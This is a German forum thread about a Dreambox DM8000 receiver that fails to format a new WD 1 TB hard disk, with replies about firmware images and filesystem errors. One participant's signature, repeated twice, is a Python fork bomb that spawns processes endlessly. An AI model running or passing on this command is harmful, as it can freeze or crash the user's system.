Neue Platte initialisieren?

    • Neue Platte initialisieren?

      Hallo,

      ich habe heute eine western digital WD10EVCS bekommen und habe diese statt der bisher genutzen WD10EADS eingebaut.
      Wird auch einwandfrei erkannt, bei Menü/informationen/Über oder auch bei Menü/Einstellungen/System/Festplatte/Initialisierung (WDC WD10EVCS-63E0B0 - Internal (976.780 GB)).
      Aber wenn ich dann 'Initialisieren' sage, arbeitet er etwa zwei Minuten vor sich hin (Rädchen drehen sich) und bemängelt dann
      Die Festplatte konnte nicht initialisiert werden.
      Fehler: Mkfs failed
      Was mache da falsch?
      Gibt es da vielleicht irgendwelche Jumper zu beachten?

      Schon mal danke
    • RE: Neue Platte initialisieren?

      Original von Dreamente
      Also ich habe meine 1TB WD Platte mit dem DMM Image initialisiert, das ging ohne Probleme.


      also ich habe das release-dm8000_20081210.nfi vom Dream Multimedia VIP-Board/Stabile Firmwares, dm8000-vi...loadDBData&dataID=33 genommen, das ist doch das richtige?
      Ergebnis: Leider das Gleiche wie oben!
      Was für ein Image kann denn das nun garantiert?
      Bitte gleich mit dem passenden Link!
    • V2.3.1 aktiv!

      Original von kati910
      Haste das 2.3.1 von hier mal getestet?

      Ständverselbstlich!
      Schönes Image!!
      Habe außer dem von DMM noch zwei OoZooN probiert, beim ersten wieder die Fehlermeldung, beim zweiten (17.01.09) initialisiert er schon eine halbe Stunde!
      Dauernd die drehenden Zahnrädchen!
    • Dauernd die drehenden Zahnrädchen! <-Solange er formatiert drehen die sich und das dauerd seine zeit bei ner 1Tb platte.
      Das 2.3.1 von hier sollte aber gehen da ist der mkfs fehler eigentlich gefixt
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Original von kati910
      Dauernd die drehenden Zahnrädchen! <-Solange er formatiert drehen die sich und das dauerd seine zeit bei ner 1Tb platte.
      Das 2.3.1 von hier sollte aber gehen da ist der mkfs fehler eigentlich gefixt


      Ich habe nochmals die 2.3.1 installiert (geht inzwischen im Schlaf!).
      Die Western digital WD10EVCS wird in 3:30 Minuten formatiert, aber ohne jegliche Abschlussmeldung, hört einfach auf

      Ein filesystem-check bringt dann aber
      Unable to complete filesystem check.
      Error: Filesystem contains uncorrectable errors

      Und das Abspeichern der Settings erbringt
      Sorry your Backup destination does not exist
      Please choose an other one
    • Von dmm ist keine Abschlussmeldung vorgesehen da kommt nur ne meldung wenn ein fehler auftritt.
      Zum filesystem check haste da mal zwischen dem formatieren und dem check ein kompletten neustart gemacht?
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !